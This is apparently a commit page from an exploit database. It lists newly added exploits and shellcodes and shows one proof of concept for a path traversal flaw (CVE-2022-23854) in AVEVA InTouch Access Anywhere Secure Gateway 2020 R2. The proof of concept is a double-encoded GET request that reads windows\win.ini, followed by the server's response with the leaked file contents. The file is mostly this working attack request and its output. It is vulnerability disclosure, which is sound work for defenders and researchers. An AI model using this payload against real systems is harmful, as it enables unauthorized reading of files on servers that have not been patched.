c9e53fa57b
7 changes to exploits/shellcodes/ghdb
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)
Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
CVAT 2.0 - SSRF (Server Side Request Forgery)
IOTransfer V4 - Unquoted Service Path
NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)
Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)
Linux/MIPS - reboot() Shellcode (32 bytes)
Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)
Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)
22 lines
No EOL
604 B
Text
22 lines
No EOL
604 B
Text
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
|
|
Exploit Author: Jens Regel (CRISEC IT-Security)
|
|
Date: 11/11/2022
|
|
CVE: CVE-2022-23854
|
|
Version: Access Anywhere Secure Gateway versions 2020 R2 and older
|
|
|
|
Proof of Concept:
|
|
GET
|
|
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
|
|
HTTP/1.1
|
|
|
|
HTTP/1.1 200 OK
|
|
Server: EricomSecureGateway/8.4.0.26844.*
|
|
(..)
|
|
|
|
; for 16-bit app support
|
|
[fonts]
|
|
[extensions]
|
|
[mci extensions]
|
|
[files]
|
|
[Mail]
|
|
MAPI=1 |